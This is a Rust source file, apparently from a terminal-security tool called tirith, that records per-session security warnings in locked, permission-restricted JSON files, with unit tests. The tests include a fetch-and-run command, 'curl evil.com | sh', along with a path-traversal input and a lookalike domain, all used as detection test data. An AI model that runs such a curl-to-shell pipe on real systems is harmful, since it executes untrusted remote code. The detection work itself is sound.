1use std::collections::VecDeque;
11use std::fs::{self, OpenOptions};
12use std::io::Write;
13use std::path::PathBuf;
14
15use fs2::FileExt;
16use serde::{Deserialize, Serialize};
17
18use crate::verdict::{Evidence, Finding};
19
20const MAX_EVENTS: usize = 100;
22const MAX_ESCALATION_EVENTS: usize = 20;
24const MAX_HIDDEN_EVENTS: usize = 50;
26
27#[derive(Debug, Clone, Serialize, Deserialize)]
29pub struct SessionWarnings {
30 pub session_id: String,
31 pub session_start: String,
32 pub total_warnings: u32,
33 #[serde(default)]
35 pub hidden_findings: u32,
36 #[serde(default)]
38 pub hidden_low: u32,
39 #[serde(default)]
40 pub hidden_info: u32,
41 pub events: VecDeque<WarningEvent>,
42 #[serde(default)]
45 pub escalation_events: VecDeque<EscalationEvent>,
46 #[serde(default)]
48 pub hidden_events: VecDeque<HiddenEvent>,
49}
50
51#[derive(Debug, Clone, Serialize, Deserialize)]
53pub struct WarningEvent {
54 pub timestamp: String,
55 pub rule_id: String,
56 pub severity: String,
57 pub title: String,
58 pub command_redacted: String,
59 pub domains: Vec<String>,
60}
61
62#[derive(Debug, Clone, Serialize, Deserialize)]
68pub struct EscalationEvent {
69 pub timestamp: String,
70 pub rule_id: String,
71 #[serde(default, skip_serializing_if = "Option::is_none")]
72 pub domain: Option<String>,
73}
74
75#[derive(Debug, Clone, Serialize, Deserialize)]
77pub struct HiddenEvent {
78 pub timestamp: String,
79 pub rule_id: String,
80 pub severity: String,
81 pub title: String,
82 pub command_redacted: String,
83}
84
85impl SessionWarnings {
86 fn new(session_id: &str) -> Self {
88 Self {
89 session_id: session_id.to_string(),
90 session_start: chrono::Utc::now().to_rfc3339(),
91 total_warnings: 0,
92 hidden_findings: 0,
93 hidden_low: 0,
94 hidden_info: 0,
95 events: VecDeque::new(),
96 escalation_events: VecDeque::new(),
97 hidden_events: VecDeque::new(),
98 }
99 }
100
101 pub fn count_by_rule(&self, rule_id: &str, window_minutes: u64) -> u32 {
103 let cutoff = cutoff_time(window_minutes);
104 self.events
105 .iter()
106 .filter(|e| e.rule_id == rule_id && e.timestamp.as_str() >= cutoff.as_str())
107 .count() as u32
108 }
109
110 pub fn count_by_rule_and_domain(
112 &self,
113 rule_id: &str,
114 domain: &str,
115 window_minutes: u64,
116 ) -> u32 {
117 let cutoff = cutoff_time(window_minutes);
118 let domain_lower = domain.to_lowercase();
119 self.events
120 .iter()
121 .filter(|e| {
122 e.rule_id == rule_id
123 && e.timestamp.as_str() >= cutoff.as_str()
124 && e.domains.iter().any(|d| d.to_lowercase() == domain_lower)
125 })
126 .count() as u32
127 }
128
129 pub fn count_all(&self, window_minutes: u64) -> u32 {
131 let cutoff = cutoff_time(window_minutes);
132 self.events
133 .iter()
134 .filter(|e| e.timestamp.as_str() >= cutoff.as_str())
135 .count() as u32
136 }
137
138 pub fn top_rules(&self) -> Vec<(String, u32)> {
140 let mut counts = std::collections::HashMap::<String, u32>::new();
141 for e in &self.events {
142 *counts.entry(e.rule_id.clone()).or_default() += 1;
143 }
144 let mut sorted: Vec<_> = counts.into_iter().collect();
145 sorted.sort_by_key(|s| std::cmp::Reverse(s.1));
146 sorted
147 }
148}
149
150fn cutoff_time(window_minutes: u64) -> String {
152 let cutoff =
153 chrono::Utc::now() - chrono::Duration::minutes(window_minutes.min(u32::MAX as u64) as i64);
154 cutoff.to_rfc3339()
155}
156
157pub fn session_state_path(session_id: &str) -> Option<PathBuf> {
162 if session_id.is_empty() || session_id.len() > 128 {
163 return None;
164 }
165 if !session_id
166 .chars()
167 .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
168 {
169 return None;
170 }
171 let state = crate::policy::state_dir()?;
172 Some(state.join("sessions").join(format!("{session_id}.json")))
173}
174
175pub fn load(session_id: &str) -> SessionWarnings {
180 let path = match session_state_path(session_id) {
181 Some(p) => p,
182 None => return SessionWarnings::new(session_id),
183 };
184
185 let file = match fs::File::open(&path) {
186 Ok(f) => f,
187 Err(_) => return SessionWarnings::new(session_id),
188 };
189
190 if fs2::FileExt::lock_shared(&file).is_err() && fs2::FileExt::try_lock_shared(&file).is_err() {
192 return SessionWarnings::new(session_id);
193 }
194
195 use std::io::Read;
196 let mut content = String::new();
197 let result = (&file).read_to_string(&mut content);
198 let _ = fs2::FileExt::unlock(&file);
199
200 if result.is_err() || content.is_empty() {
201 return SessionWarnings::new(session_id);
202 }
203
204 serde_json::from_str::<SessionWarnings>(&content).unwrap_or_else(|e| {
205 crate::audit::audit_diagnostic(format!(
206 "tirith: session: corrupt state for '{}': {e} — resetting",
207 session_id
208 ));
209 SessionWarnings::new(session_id)
210 })
211}
212
213pub fn record_warning(session_id: &str, findings: &[&Finding], cmd: &str, dlp_patterns: &[String]) {
217 record_outcome(session_id, findings, &[], cmd, dlp_patterns);
218}
219
220pub fn record_outcome(
228 session_id: &str,
229 warn_findings: &[&Finding],
230 hidden_findings_list: &[&Finding],
231 cmd: &str,
232 dlp_patterns: &[String],
233) {
234 if warn_findings.is_empty() && hidden_findings_list.is_empty() {
235 return;
236 }
237
238 let hidden_count = hidden_findings_list.len() as u32;
240 let hidden_low = hidden_findings_list
241 .iter()
242 .filter(|f| f.severity == crate::verdict::Severity::Low)
243 .count() as u32;
244 let hidden_info = hidden_findings_list
245 .iter()
246 .filter(|f| f.severity == crate::verdict::Severity::Info)
247 .count() as u32;
248
249 let command_redacted = crate::redact::redact_command_text(cmd, dlp_patterns);
251 let command_redacted = crate::util::truncate_bytes(&command_redacted, 120);
252 let now = chrono::Utc::now().to_rfc3339();
253
254 struct FindingData {
256 rule_id: String,
257 severity: String,
258 title: String,
259 domains: Vec<String>,
260 }
261 let finding_data: Vec<FindingData> = warn_findings
262 .iter()
263 .map(|f| FindingData {
264 rule_id: f.rule_id.to_string(),
265 severity: f.severity.to_string(),
266 title: crate::util::truncate_bytes(&f.title, 120),
267 domains: extract_domains_from_evidence(&f.evidence),
268 })
269 .collect();
270
271 let hidden_data: Vec<FindingData> = hidden_findings_list
273 .iter()
274 .map(|f| FindingData {
275 rule_id: f.rule_id.to_string(),
276 severity: f.severity.to_string(),
277 title: crate::util::truncate_bytes(&f.title, 120),
278 domains: Vec::new(), })
280 .collect();
281
282 with_session_locked(session_id, |session| {
283 session.hidden_findings = session.hidden_findings.saturating_add(hidden_count);
285 session.hidden_low = session.hidden_low.saturating_add(hidden_low);
286 session.hidden_info = session.hidden_info.saturating_add(hidden_info);
287
288 for fd in &finding_data {
290 let event = WarningEvent {
291 timestamp: now.clone(),
292 rule_id: fd.rule_id.clone(),
293 severity: fd.severity.clone(),
294 title: fd.title.clone(),
295 command_redacted: command_redacted.clone(),
296 domains: fd.domains.clone(),
297 };
298 session.events.push_back(event);
299 session.total_warnings = session.total_warnings.saturating_add(1);
300 }
301
302 for hd in &hidden_data {
304 session.hidden_events.push_back(HiddenEvent {
305 timestamp: now.clone(),
306 rule_id: hd.rule_id.clone(),
307 severity: hd.severity.clone(),
308 title: hd.title.clone(),
309 command_redacted: command_redacted.clone(),
310 });
311 }
312
313 while session.events.len() > MAX_EVENTS {
315 session.events.pop_front();
316 }
317
318 while session.hidden_events.len() > MAX_HIDDEN_EVENTS {
320 session.hidden_events.pop_front();
321 }
322 });
323}
324
325pub fn record_escalation_event(session_id: &str, hits: &[crate::escalation::EscalationHit]) {
331 if hits.is_empty() {
332 return;
333 }
334
335 let now = chrono::Utc::now().to_rfc3339();
336
337 with_session_locked(session_id, |session| {
338 for hit in hits {
339 session.escalation_events.push_back(EscalationEvent {
340 timestamp: now.clone(),
341 rule_id: hit.rule_id.clone(),
342 domain: hit.domain.clone(),
343 });
344 }
345 while session.escalation_events.len() > MAX_ESCALATION_EVENTS {
347 session.escalation_events.pop_front();
348 }
349 });
350}
351
352fn with_session_locked<F>(session_id: &str, mutate: F)
358where
359 F: FnOnce(&mut SessionWarnings),
360{
361 let path = match session_state_path(session_id) {
362 Some(p) => p,
363 None => return,
364 };
365
366 if let Some(parent) = path.parent() {
368 if let Err(e) = fs::create_dir_all(parent) {
369 crate::audit::audit_diagnostic(format!(
370 "tirith: session: cannot create state dir {}: {e}",
371 parent.display()
372 ));
373 return;
374 }
375 }
376
377 #[cfg(unix)]
379 {
380 match std::fs::symlink_metadata(&path) {
381 Ok(meta) if meta.file_type().is_symlink() => {
382 crate::audit::audit_diagnostic(format!(
383 "tirith: session: refusing to follow symlink at {}",
384 path.display()
385 ));
386 return;
387 }
388 _ => {}
389 }
390 }
391
392 let mut open_opts = OpenOptions::new();
394 open_opts.read(true).write(true).create(true);
395 #[cfg(unix)]
396 {
397 use std::os::unix::fs::OpenOptionsExt;
398 open_opts.mode(0o600);
399 open_opts.custom_flags(libc::O_NOFOLLOW);
400 }
401
402 let file = match open_opts.open(&path) {
403 Ok(f) => f,
404 Err(e) => {
405 crate::audit::audit_diagnostic(format!(
406 "tirith: session: cannot open {} — escalation may be impaired: {e}",
407 path.display()
408 ));
409 return;
410 }
411 };
412
413 #[cfg(unix)]
415 {
416 use std::os::unix::fs::PermissionsExt;
417 let _ = file.set_permissions(std::fs::Permissions::from_mode(0o600));
418 }
419
420 let locked = file.lock_exclusive().is_ok() || file.try_lock_exclusive().is_ok();
422 if !locked {
423 crate::audit::audit_diagnostic(format!(
424 "tirith: session: cannot lock {} — recording skipped",
425 path.display()
426 ));
427 return;
428 }
429
430 use std::io::Read;
432 let mut content = String::new();
433 let _ = (&file).read_to_string(&mut content);
434 let mut session: SessionWarnings = if content.is_empty() {
435 SessionWarnings::new(session_id)
436 } else {
437 serde_json::from_str(&content).unwrap_or_else(|e| {
438 crate::audit::audit_diagnostic(format!(
439 "tirith: session: corrupt state for '{}': {e} — resetting",
440 session_id
441 ));
442 SessionWarnings::new(session_id)
443 })
444 };
445
446 mutate(&mut session);
448
449 let json = match serde_json::to_string(&session) {
450 Ok(j) => j,
451 Err(e) => {
452 crate::audit::audit_diagnostic(format!(
453 "tirith: session: failed to serialize warnings: {e}"
454 ));
455 let _ = fs2::FileExt::unlock(&file);
456 return;
457 }
458 };
459
460 use std::io::Seek;
462 if file.set_len(0).is_err() || (&file).seek(std::io::SeekFrom::Start(0)).is_err() {
463 crate::audit::audit_diagnostic(format!(
464 "tirith: session: truncate/seek failed for {} — skipping write",
465 path.display()
466 ));
467 let _ = fs2::FileExt::unlock(&file);
468 return;
469 }
470 let mut writer = std::io::BufWriter::new(&file);
471 if let Err(e) = writer.write_all(json.as_bytes()) {
472 crate::audit::audit_diagnostic(format!(
473 "tirith: session: write failed for {}: {e}",
474 path.display()
475 ));
476 }
477 if let Err(e) = writer.flush() {
478 crate::audit::audit_diagnostic(format!(
479 "tirith: session: flush failed for {}: {e}",
480 path.display()
481 ));
482 }
483 let _ = file.sync_all();
484 let _ = fs2::FileExt::unlock(&file);
485
486 opportunistic_gc();
488}
489
490pub fn extract_domains_from_evidence(evidence: &[Evidence]) -> Vec<String> {
492 let mut domains = Vec::new();
493 for ev in evidence {
494 match ev {
495 Evidence::Url { raw } => {
496 if let Some(host) = extract_host(raw) {
497 domains.push(host);
498 }
499 }
500 Evidence::HostComparison { raw_host, .. } => {
501 domains.push(raw_host.to_lowercase());
502 }
503 _ => {}
504 }
505 }
506 domains.sort();
507 domains.dedup();
508 domains
509}
510
511fn extract_host(url: &str) -> Option<String> {
513 if let Ok(parsed) = url::Url::parse(url) {
514 return parsed.host_str().map(|h| h.to_lowercase());
515 }
516 let candidate = url.split('/').next()?;
518 if candidate.contains('.') && !candidate.contains(' ') {
519 let host = candidate.split(':').next().unwrap_or(candidate);
520 return Some(host.to_lowercase());
521 }
522 None
523}
524
525fn opportunistic_gc() {
530 let gc_marker = match crate::policy::state_dir() {
531 Some(d) => d.join("sessions").join(".last_gc"),
532 None => return,
533 };
534 if let Ok(meta) = fs::metadata(&gc_marker) {
535 if let Ok(modified) = meta.modified() {
536 if let Ok(age) = modified.elapsed() {
537 if age.as_secs() < 3600 {
538 return;
539 }
540 }
541 }
542 }
543 let _ = fs::write(&gc_marker, "");
545 gc_stale_sessions(72);
546}
547
548pub fn gc_stale_sessions(max_age_hours: u64) {
550 let state = match crate::policy::state_dir() {
551 Some(s) => s,
552 None => return,
553 };
554 let sessions_dir = state.join("sessions");
555 let entries = match fs::read_dir(&sessions_dir) {
556 Ok(e) => e,
557 Err(_) => return,
558 };
559
560 let max_age = std::time::Duration::from_secs(max_age_hours * 3600);
561 let now = std::time::SystemTime::now();
562
563 for entry in entries.flatten() {
564 let path = entry.path();
565 if path.extension().and_then(|e| e.to_str()) != Some("json") {
566 continue;
567 }
568 let meta = match fs::metadata(&path) {
569 Ok(m) => m,
570 Err(_) => continue,
571 };
572 let modified = match meta.modified() {
573 Ok(t) => t,
574 Err(_) => continue,
575 };
576 if let Ok(age) = now.duration_since(modified) {
577 if age > max_age {
578 let _ = fs::remove_file(&path);
579 }
580 }
581 }
582}
583
584pub fn clear_session(session_id: &str) {
586 if let Some(path) = session_state_path(session_id) {
587 let _ = fs::remove_file(&path);
588 }
589}
590
591#[cfg(test)]
592mod tests {
593 use super::*;
594 use crate::verdict::{Evidence, Finding, RuleId, Severity};
595
596 fn make_finding(rule_id: RuleId, severity: Severity) -> Finding {
597 Finding {
598 rule_id,
599 severity,
600 title: "Test finding".to_string(),
601 description: "desc".to_string(),
602 evidence: vec![Evidence::Url {
603 raw: "https://evil.example.com/path".to_string(),
604 }],
605 human_view: None,
606 agent_view: None,
607 mitre_id: None,
608 custom_rule_id: None,
609 }
610 }
611
612 #[test]
613 fn test_session_state_path_validation() {
614 assert!(session_state_path("abc-123_DEF").is_some());
616 assert!(session_state_path("a").is_some());
617
618 assert!(session_state_path("").is_none());
620
621 assert!(session_state_path("../etc/passwd").is_none());
623 assert!(session_state_path("foo/bar").is_none());
624 assert!(session_state_path("..").is_none());
625
626 assert!(session_state_path("foo bar").is_none());
628 assert!(session_state_path("foo.bar").is_none());
629
630 let long_id = "a".repeat(129);
632 assert!(session_state_path(&long_id).is_none());
633
634 let max_id = "a".repeat(128);
636 assert!(session_state_path(&max_id).is_some());
637 }
638
639 #[test]
640 fn test_load_returns_default_on_missing() {
641 let session = load("nonexistent-session-id-12345");
642 assert_eq!(session.session_id, "nonexistent-session-id-12345");
643 assert_eq!(session.total_warnings, 0);
644 assert!(session.events.is_empty());
645 }
646
647 #[cfg(unix)]
648 #[test]
649 fn test_record_and_load_cycle() {
650 let _guard = crate::TEST_ENV_LOCK
651 .lock()
652 .unwrap_or_else(|e| e.into_inner());
653
654 let dir = tempfile::tempdir().unwrap();
655 let state_home = dir.path().join("state");
656 unsafe { std::env::set_var("XDG_STATE_HOME", &state_home) };
657
658 let session_id = "test-session-rec-001";
659
660 let f1 = make_finding(RuleId::CurlPipeShell, Severity::High);
662 let f2 = make_finding(RuleId::NonAsciiHostname, Severity::Medium);
663 record_warning(session_id, &[&f1, &f2], "curl evil.com | sh", &[]);
664
665 let session = load(session_id);
667 assert_eq!(session.total_warnings, 2);
668 assert_eq!(session.events.len(), 2);
669 assert_eq!(session.events[0].rule_id, "curl_pipe_shell");
670 assert_eq!(session.events[1].rule_id, "non_ascii_hostname");
671
672 assert!(session.events[0]
674 .domains
675 .contains(&"evil.example.com".to_string()));
676
677 let f3 = make_finding(RuleId::ShortenedUrl, Severity::Low);
679 record_warning(session_id, &[&f3], "bit.ly/foo", &[]);
680
681 let session = load(session_id);
682 assert_eq!(session.total_warnings, 3);
683 assert_eq!(session.events.len(), 3);
684
685 clear_session(session_id);
687 let session = load(session_id);
688 assert_eq!(session.total_warnings, 0);
689
690 unsafe { std::env::remove_var("XDG_STATE_HOME") };
691 }
692
693 #[test]
694 fn test_count_by_rule_with_window() {
695 let mut session = SessionWarnings::new("test");
696 session.events.push_back(WarningEvent {
698 timestamp: chrono::Utc::now().to_rfc3339(),
699 rule_id: "curl_pipe_shell".to_string(),
700 severity: "HIGH".to_string(),
701 title: "test".to_string(),
702 command_redacted: "cmd".to_string(),
703 domains: vec![],
704 });
705 let old_time = (chrono::Utc::now() - chrono::Duration::hours(2)).to_rfc3339();
707 session.events.push_back(WarningEvent {
708 timestamp: old_time,
709 rule_id: "curl_pipe_shell".to_string(),
710 severity: "HIGH".to_string(),
711 title: "test".to_string(),
712 command_redacted: "cmd".to_string(),
713 domains: vec![],
714 });
715
716 assert_eq!(session.count_by_rule("curl_pipe_shell", 60), 1);
718 assert_eq!(session.count_by_rule("curl_pipe_shell", 180), 2);
720 assert_eq!(session.count_by_rule("non_ascii_hostname", 180), 0);
722 }
723
724 #[test]
725 fn test_count_by_rule_and_domain() {
726 let mut session = SessionWarnings::new("test");
727 session.events.push_back(WarningEvent {
728 timestamp: chrono::Utc::now().to_rfc3339(),
729 rule_id: "non_ascii_hostname".to_string(),
730 severity: "MEDIUM".to_string(),
731 title: "test".to_string(),
732 command_redacted: "cmd".to_string(),
733 domains: vec!["evil.com".to_string()],
734 });
735 session.events.push_back(WarningEvent {
736 timestamp: chrono::Utc::now().to_rfc3339(),
737 rule_id: "non_ascii_hostname".to_string(),
738 severity: "MEDIUM".to_string(),
739 title: "test".to_string(),
740 command_redacted: "cmd".to_string(),
741 domains: vec!["good.com".to_string()],
742 });
743
744 assert_eq!(
745 session.count_by_rule_and_domain("non_ascii_hostname", "evil.com", 60),
746 1
747 );
748 assert_eq!(
749 session.count_by_rule_and_domain("non_ascii_hostname", "good.com", 60),
750 1
751 );
752 assert_eq!(
753 session.count_by_rule_and_domain("non_ascii_hostname", "other.com", 60),
754 0
755 );
756 }
757
758 #[test]
759 fn test_count_all() {
760 let mut session = SessionWarnings::new("test");
761 for _ in 0..5 {
762 session.events.push_back(WarningEvent {
763 timestamp: chrono::Utc::now().to_rfc3339(),
764 rule_id: "any_rule".to_string(),
765 severity: "LOW".to_string(),
766 title: "test".to_string(),
767 command_redacted: "cmd".to_string(),
768 domains: vec![],
769 });
770 }
771 assert_eq!(session.count_all(60), 5);
772 }
773
774 #[test]
775 fn test_top_rules() {
776 let mut session = SessionWarnings::new("test");
777 for _ in 0..3 {
778 session.events.push_back(WarningEvent {
779 timestamp: chrono::Utc::now().to_rfc3339(),
780 rule_id: "rule_a".to_string(),
781 severity: "LOW".to_string(),
782 title: "test".to_string(),
783 command_redacted: "cmd".to_string(),
784 domains: vec![],
785 });
786 }
787 session.events.push_back(WarningEvent {
788 timestamp: chrono::Utc::now().to_rfc3339(),
789 rule_id: "rule_b".to_string(),
790 severity: "LOW".to_string(),
791 title: "test".to_string(),
792 command_redacted: "cmd".to_string(),
793 domains: vec![],
794 });
795
796 let top = session.top_rules();
797 assert_eq!(top[0], ("rule_a".to_string(), 3));
798 assert_eq!(top[1], ("rule_b".to_string(), 1));
799 }
800
801 #[test]
802 fn test_event_cap() {
803 let mut session = SessionWarnings::new("test");
804 for i in 0..150 {
805 session.events.push_back(WarningEvent {
806 timestamp: chrono::Utc::now().to_rfc3339(),
807 rule_id: format!("rule_{i}"),
808 severity: "LOW".to_string(),
809 title: "test".to_string(),
810 command_redacted: "cmd".to_string(),
811 domains: vec![],
812 });
813 session.total_warnings += 1;
814 }
815 while session.events.len() > MAX_EVENTS {
817 session.events.pop_front();
818 }
819 assert_eq!(session.events.len(), MAX_EVENTS);
820 assert_eq!(session.total_warnings, 150);
821 }
822
823 #[test]
824 fn test_extract_domains_from_evidence() {
825 let evidence = vec![
826 Evidence::Url {
827 raw: "https://evil.example.com/path".to_string(),
828 },
829 Evidence::HostComparison {
830 raw_host: "GITHUB.COM".to_string(),
831 similar_to: "g1thub.com".to_string(),
832 },
833 Evidence::Text {
834 detail: "irrelevant".to_string(),
835 },
836 ];
837 let domains = extract_domains_from_evidence(&evidence);
838 assert!(domains.contains(&"evil.example.com".to_string()));
839 assert!(domains.contains(&"github.com".to_string()));
840 assert_eq!(domains.len(), 2);
841 }
842}